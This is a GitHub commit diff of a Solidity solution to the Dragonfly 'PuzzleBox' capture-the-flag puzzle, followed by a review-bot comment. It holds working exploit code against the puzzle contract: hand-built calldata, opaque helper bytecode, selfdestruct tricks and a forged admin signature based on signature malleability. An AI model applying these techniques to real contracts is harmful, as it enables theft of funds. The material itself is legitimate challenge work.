🗑️ Cleanup leaderboard solution
smitrajput committed May 29, 2023
1 parent ab41abf commit 82ad516
Showing 2 changed files with 43 additions and 191 deletions.
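--- a/src/PuzzleBoxSolution.sol
+++ b/src/PuzzleBoxSolution.sol
@@ -78,189 +78,3 @@ contract Operate {
 }
 }
 }
-
-
-// uint256[] memory inputArray2 = new uint256[](3);
-// inputArray2[0] = 1;
-// inputArray2[1] = 9;
-// inputArray2[2] = 10;
-// encodedDripIds = abi.encode(inputArray2);
-// puzzle.torch(encodedDripIds);
-
-// contract A {
-// receive() external payable {}
-// }
-
-// contract AFactory {
-// bytes32 constant salt = 0x7e99dadb0f9c9a21a0b0a07907baea686b2a2b0f1c8e0e480a390be5c2f5a5a5;
-
-// function deployA() public {
-// bytes memory bytecode = type(A).creationCode;
-// assembly {
-// let addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt)
-// if iszero(extcodesize(addr)) {
-// revert(0, 0)
-// }
-// }
-// }
-
-// function computeAddress() public view returns (address) {
-// bytes32 codehash = keccak256(type(A).creationCode);
-// return address(uint160(uint(keccak256(abi.encodePacked(bytes1(0xff), address(this), salt, codehash)))));
-// }
-// }
-
-// console.log('gasleft1', gasleft());
-// puzzle.zip{gas: 1000000}();
-// console.log('isValidDripId %s', 1, puzzle.isValidDripId(1));
-// console.log('Puzzle eth', address(puzzle).balance);
-// address nextAddr = 0x037eDA3aDb1198021A9b2e88C22B464fd38db3f4;
-
-// AFactory factory = new AFactory();
-// console.log('factory', address(factory));
-
-// // deployA();
-// console.log('deployedA', factory.computeAddress());
-// console.logBytes(type(A).creationCode);
-// console.log('next addr eth', nextAddr.balance);
-// console.log('codeLength', nextAddr.code.length);
-
-
-// // Step 3: Zip
-// puzzle.zip();
-
-// // Step 4: Creep
-// puzzle.creep();
-
-// // Step 5: Spread
-// address payable[] memory friends = new address payable[](2);
-// uint256[] memory friendsCutBps = new uint256[](friends.length);
-// friends[0] = payable(0x416e59DaCfDb5D457304115bBFb9089531D873B7);
-// friends[1] = payable(0xC817dD2a5daA8f790677e399170c92AabD044b57);
-// friendsCutBps[0] = 0.015e4;
-// friendsCutBps[1] = 0.0075e4;
-// puzzle.spread(friends, friendsCutBps);
-
-// // Step 6: Open the puzzle
-// bytes memory adminSig = abi.encodePacked(
-// hex"c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8",
-// hex"625cb970c2768fefafc3512a3ad9764560b330dcafe02714654fe48dd069b6df",
-// hex"1c"
-// );
-// puzzle.open(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8, adminSig);
-
-
-// for(uint256 i = 1; i <= 572; i++) {
-// puzzle.leak();
-// }
-// puzzle.creep();
-// for(uint256 i = 1; i <= 6; i++) {
-// puzzle.leak();
-// }
-
-
-///////////////////////////////////////////////////////////////////////////
-// CleanPuzzleBoxSolution comments
-///////////////////////////////////////////////////////////////////////////
-
-// console.log('puzzle address', address(puzzle));
-// vm.breakpoint("a");
-// Helper operate = new Helper(puzzle);
-// address(operate).call("");
-// bytes memory selectoors = abi.encodePacked(
-// puzzle.operate.selector,
-// puzzle.leak.selector,
-// puzzle.zip.selector,
-// puzzle.creep.selector,
-// // torch calldata
-// hex"925facb100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000009",
-// // spread calldata
-// hex"2b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b",
-// // open calldata
-// hex"58657dcfc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d800000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000041c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d89da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a621b00000000000000000000000000000000000000000000000000000000000000"
-// );
-
-// add puzzle.leakCount to access set (i.e. make it warm)
-// puzzle.leak(); ------------> assemblified above
-// address(uint160(address(puzzle)) + uint160(2)) = 0x037EDA3AdB1198021A9B2e88C22B464Fd38DB3f5
-// add puzzle + 2 to access set (i.e. make it warm) AND avoid the 25k value_to_empty_account_cost gas on calling zip()
-// unchecked {
-// payable(address(uint160(address(puzzle)) + uint160(2))).transfer(1); ------------> assemblified above
-// }
-// puzzle.zip(); ------------> assemblified above
-
-// puzzle.creep{gas: 98000}(); ------------> assemblified above
-
-// uint256[] memory n = new uint256[](6);
-// assembly {
-// mstore(add(n, 0x20), 2)
-// mstore(add(n, 0x40), 4)
-// mstore(add(n, 0x60), 6)
-// mstore(add(n, 0x80), 7)
-// mstore(add(n, 0xa0), 8)
-// mstore(add(n, 0xc0), 9)
-// }
-// bytes memory encodedDripIds = abi.encode(n);
-
-// // TODO: need to understand this calldata encoding scheme
-// address(puzzle).call(hex"925facb100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000009");
-// console.logBytes(abi.encodePacked(
-// puzzle.torch.selector, uint256(0x01), uint8(0), encodedDripIds));
-
-// assembly {
-// pop(call(gas(), 0x037eDa3aDB1198021A9b2e88C22B464fD38db3f3, 0, add(selectoors, 0x30), 4, 0, 0))
-// }
-
-
-// address payable[] memory friends = new address payable[](1);
-// uint256[] memory friendsCutBps = new uint256[](3);
-// assembly {
-// mstore(add(friends, 0x20), 0x416e59DaCfDb5D457304115bBFb9089531D873B7)
-// mstore(add(friendsCutBps, 0x20), 0x00C817dD2a5daA8f790677e399170c92AabD044b57)
-// mstore(add(friendsCutBps, 0x40), 150)
-// mstore(add(friendsCutBps, 0x60), 75)
-// }
-
-// // puzzle.spread(friends, friendsCutBps);
-// bytes memory spreadData = abi.encodeWithSelector(puzzle.spread.selector, friends, friendsCutBps);
-// console.logBytes(spreadData);
-// address(puzzle).call(hex"2b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b");
-
-// uint256 nonce = 0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8;
-// // uint256 r = uint256(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8);
-// // S_THRESHOLD - uint256(0x625cb970c2768fefafc3512a3ad9764560b330dcafe02714654fe48dd069b6df)
-// // = 71301600283128936764672812745529451294904726341347593422192209434084996057698
-// uint256 s = 71301600283128936764672812745529451294904726341347593422192209434084996057698;
-// uint8 v = 27;
-// //= abi.encodePacked(nonce, s, v);
-// bytes memory sign = abi.encodePacked(nonce, s, v);
-// // assembly {
-// // mstore(add(sign, 0x20), nonce)
-// // mstore(add(sign, 0x40), s)
-// // mstore(add(sign, 0x60), v)
-// // }
-// // puzzle.open(nonce, sign);
-// console.logBytes(abi.encodeWithSelector(puzzle.open.selector, nonce, sign));
-// address(puzzle).call(abi.encodeWithSelector(puzzle.open.selector, nonce, sign));
-
-// NOTE: this costs 6k less gas
-// puzzle.open(0xc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8,
-// (
-// hex"c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d8"
-// hex"9da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a62"
-// hex"1b"
-// ));
-
-// fallback() {
-// if(address(this).balance != 337) {
-// address(puzzle).call{value:101}(hex"9f678cca");
-// // puzzle.drip{value: 101}();
-// // console.logBytes4(bytes4(keccak256("drip()"))); //0x9f678cca
-// } else {
-// selfdestruct(payable(solution));
-// }
-
-// PuzzleBoxProxy(payable(0x037eDa3aDB1198021A9b2e88C22B464fD38db3f3)).lock(puzzle.torch.selector, false);
-
-// console.logBytes4(bytes4(keccak256("operate()")));
-// console.logBytes(abi.encodeWithSignature("lock(bytes4,bool)", hex"41c0e1a1", false));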
48 changes: 43 additions & 5 deletions src/PBS_16152.sol → src/PuzzleBoxSolution_V1.sol
@@ -2,18 +2,25 @@ pragma solidity ^0.8.19;

import "./PuzzleBox.sol";

contract PuzzleBoxSolution {
/// This is the solution that put me to #6 on the (live) leaderboard: https://ctf.dragonfly.xyz/scores
contract PuzzleBoxSolution_V1 {

fallback() external payable {
// How close can you get to opening the box?
bytes memory selectoors = hex"7159a6188fd66f250091905511551052925facb1000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000007000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000092b071e47000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000001000000000000000000000000416e59dacfdb5d457304115bbfb9089531d873b70000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c817dd2a5daa8f790677e399170c92aabd044b570000000000000000000000000000000000000000000000000000000000000096000000000000000000000000000000000000000000000000000000000000004b58657dcfc8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d800000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000041c8f549a7e4cb7e1c60d908cc05ceff53ad731e6ea0736edf7ffeea588dfb42d89da3468f3d897010503caed5c52689b959fbac09ff6879275a8279feffcc8a621b00000000000000000000000000000000000000000000000000000000000000";

// Helper contract (commented-out below) bytecode without assembly optimizations
// bytes memory helperCode = hex"60c060405273037eda3adb1198021a9b2e88c22b464fd38db3f373ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250503373ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff168152505060805173ffffffffffffffffffffffffffffffffffffffff16637159a6186040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156100ca57600080fd5b505af11580156100de573d6000803e3d6000fd5b5050505073037eda3adb1198021a9b2e88c22b464fd38db3f373ffffffffffffffffffffffffffffffffffffffff1663deecedd463925facb160e01b60006040518363ffffffff1660e01b81526004016101399291906101c6565b600060405180830381600087803b15801561015357600080fd5b505af1158015610167573d6000803e3d6000fd5b505050506101ef565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b6101a581610170565b82525050565b60008115159050919050565b6101c0816101ab565b82525050565b60006040820190506101db600083018561019c565b6101e860208301846101b7565b9392505050565b60805160a0516101796102126000396000609e01526000600f01526101796000f3fe6080604052610151471461009c577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1660656040516100529061012e565b60006040518083038185875af1925050503d806000811461008f576040519150601f19603f3d011682016040523d82523d6000602084013e610094565b606091505b5050506100d5565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff16ff5b005b600081905092915050565b7f9f678cca00000000000000000000000000000000000000000000000000000000600082015250565b60006101186004836100d7565b9150610123826100e2565b600482019050919050565b60006101398261010b565b915081905091905056fea26469706673582212208f094eb57682c27f678c08cf065a2df5b481a1c1e9514fcefff5890dd9318c1264736f6c63430008130033";

// dynamically stored bytecode
// bytes memory helperCode = type(Helper).creationCode;
//bytes memory helperCode = hex"60806040527f7159a618deecedd4925facb1000000000000000000000000000000000000000060005260008060046000807369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1506000806044600460007369209d8a7d258515ec9a4d25f7be1db85cb1b8265af15060b3806100776000396000f3fe6080604052610151471460008114601b5760018114606457607b565b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af150607b565b7369209d8a7d258515ec9a4d25f7be1db85cb1b828ff5b00fea26469706673582212200564873c553327d8b53135a7a550295299df669d78a88a2fc50132a93a963f7e64736f6c63430008130033";

// assembly-optimized bytecode
// bytes memory helperCode = hex"60806040527f7159a618deecedd4925facb1000000000000000000000000000000000000000060005260008060046000807369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1506000806044600460007369209d8a7d258515ec9a4d25f7be1db85cb1b8265af15060b3806100776000396000f3fe6080604052610151471460008114601b5760018114606457607b565b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af150607b565b7369209d8a7d258515ec9a4d25f7be1db85cb1b828ff5b00fea26469706673582212200564873c553327d8b53135a7a550295299df669d78a88a2fc50132a93a963f7e64736f6c63430008130033";

// assembly-optimized bytecode with compiler optimizations enabled to 1,000,000 runs
bytes memory helperCode = hex"608060405260006b7159a618deecedd4925facb160a01b81527369209d8a7d258515ec9a4d25f7be1db85cb1b826818260048485855af15081826044600485855af150505060aa806100526000396000f3fe60806040524761015114801560175760018114605d57005b7f9f678cca000000000000000000000000000000000000000000000000000000006000526000806004600060657369209d8a7d258515ec9a4d25f7be1db85cb1b8265af1005b7369209d8a7d258515ec9a4d25f7be1db85cb1b828fffea26469706673582212207d8240af97bb21dbf56dba721b468de6e8a15dc3dc21e7a0175cb7595a37898f64736f6c63430008130033";
// console.logBytes(helperCode);
// bytes memory helperCalldata = abi.encodePacked(helperCode, abi.encode(_puzzle));
// console.logBytes(helperCalldata);

assembly {
let helperAddr := create(0, add(helperCode, 0x20), mload(helperCode))
pop(call(gas(), helperAddr, 0, 0, 0, 0, 0))
@@ -35,4 +42,35 @@ contract PuzzleBoxSolution {
}
}

/* Commeted-out Helper contract, as its deployment bytecode is hardcoded above, to save gas */

// contract Helper {
// constructor() payable {
// // bytes memory data = hex"7159a618deecedd4925facb1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
// // console.logBytes4(bytes4(keccak256("torch(bytes)")));
// // console.logBytes(abi.encodeWithSignature("lock(bytes4,bool)", bytes4(keccak256("torch(bytes)")), false));
// assembly {
// mstore(0x00, hex"7159a618deecedd4925facb10000000000000000000000000000000000000000")
// // operate
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 0, 0x00, 4, 0, 0))
// // lock()
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 0, 0x04, 68, 0, 0))
// }
// }

// fallback() external payable {
// assembly {
// switch eq(selfbalance(), 337)
// case 0 {
// mstore(0, hex"9f678cca")
// pop(call(gas(), 0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826, 101, 0x00, 4, 0, 0))
// }
// case 1 {
// // warming puzzle + 2
// selfdestruct(0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B828)
// }
// }
// }
// }


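Review bot: The live `helperCode` blob in `fallback()` is passed to `create` and the result is then called, but nothing ties that bytecode to the commented-out `Helper` source at the bottom of the file, so a reader has to disassemble the hex to learn what actually runs. The blob under "Helper contract (commented-out below) bytecode without assembly optimizations" embeds `0x037eda3adb1198021a9b2e88c22b464fd38db3f3`, while the commented-out `Helper` and the other blobs target `0x69209d8a7d258515eC9a4D25F7Be1dB85cB1B826`; if that line is kept on the new side (the +/- markers are lost in this rendering), its comment no longer describes the source below it. I would keep `Helper` as compiled code in a test-only file and assert `keccak256(type(Helper).creationCode) == keccak256(helperCode)` in a test, or at least record the compiler version and optimizer settings next to the blob. The part of `fallback()` between the two hunks is not shown on this page, so the rest of the assembly block is not covered by this note.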